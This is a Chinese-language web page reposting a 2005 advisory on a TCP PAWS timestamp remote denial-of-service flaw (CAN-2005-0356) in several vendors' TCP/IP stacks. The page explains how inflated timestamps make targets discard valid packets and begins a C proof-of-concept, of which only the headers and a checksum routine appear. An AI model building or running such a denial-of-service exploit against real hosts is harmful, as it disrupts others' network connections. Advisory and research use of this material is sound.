信息提供：安全公告（或线索）提供热线：51cto.editor@_程序员之家(多家厂商的TCP/IP协议栈实现时间戳PAWS远程拒绝服务漏洞)

开发技术指南» 文章正文

引言：信息提供：安全公告（或线索）提供热线：51cto.editor@

·openbsd kernel ip »显示摘要«

摘要：信息提供：安全公告（或线索）提供热线：51cto.editor@gmail.com漏洞类别：其它攻击类型：拒绝服务攻击发布日期：2005-06-20更新日期：2005-06-20受影响系统：openbsd openbsd 3.7openbsd openbsd 3.6安全系统：无漏洞报告人：stefan miltchev漏洞描述：bugtraq id: 13977openbsd是一款开放源代码的操作......

·freebsd kernel amd64非特权硬件访问漏洞 »显示摘要«

摘要：信息提供：安全公告（或线索）提供热线：51cto.editor@gmail.com 漏洞类别：设计错误攻击类型：拒绝服务攻击发布日期： 2005-04-07 更新日期： 2005-04-07 受影响系统： freebsd freebsd 5.4-release之前版本freebsd freebsd 4.x ......

多家厂商的TCP/IP协议栈实现时间戳PAWS远程拒绝服务漏洞
上一页 ...cisco web collaboration option

hitachi alaxala ax 【程序编程相关:Cisco内容服务交换机ONDM Pin】

【推荐阅读:Cisco IOS 2GB HTTP G】

hitachi gr 4000 【扩展信息:PHPOpenChat不可靠测试脚本安全】

hitachi gr 3000

hitachi gs4000

ietf rfc 1323

安全系统:

无

漏洞报告人:

noritoshi demizu

漏洞描述:

bugtraq id: 13676

cve(can) id: can-2005-0356

rfc 793中定义的传输控制协议（tcp）允许在报文交换网络中进行可靠的主机到主机的传输.rfc 1323引入了一些增强tcp性能的技术,其中两项技术是tcp时间戳与序列号回卷保护（paws）.

tcp rfc 1323的paws技术中存在安全漏洞.如果启用了tcp时间戳的话,tcp连接的两个端点使用内部时钟用时间戳的值标记tcp首部.如果tcp paws配置为使用时间戳值的话,tcp paws实现中就会存在拒绝服务漏洞.

如果攻击者向有漏洞的计算机发送了足够多的tcp paws报文的话会出现这个漏洞.攻击者可以将报文时间戳设为很大的值.目标机器在处理这个报文时,内部计时器就会更新到这个值,这可能导致丢掉所有之后收到的有效报文,因为这些报文被认定为太旧了或无效.这种技术可能导致目标连接拒绝服务.

测试方法:

警告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.使用者风险自负！

#include <stdio.h>

#include <stdlib.h>

#include <sys/socket.h>

#include <net/if.h>

#ifdef __freebsd__

#include <net/if_var.h>

#endif

#include <netinet/in.h>

#include <netinet/in_var.h>

#include <netinet/in_systm.h>

#include <netinet/ip.h>

#include <netinet/tcp.h>

static u_int16_t

checksum(u_int16_t *data, u_int16_t length)

{

u_int32_t value = 0;

u_int16_t i;

for (i = 0; i < (length >> 1); ++i)

... 下一页

·apple macos x terminal sudo命令未授权访问漏洞 »显示摘要«

摘要：信息提供：安全公告（或线索）提供热线：51cto.editor@gmail.com漏洞类别：设计错误攻击类型：本地越权访问发布日期：2003-11-19更新日期：2003-11-25受影响系统：apple macos x 10.3apple macos x 10.2.7apple macos x 10.2.3安全系统：无漏洞报告人：rick downes （rixstep@kagi.com）漏洞描......

» 本期热门文章：

· 热门栏目：

» 相关精选文章

» 其它相关：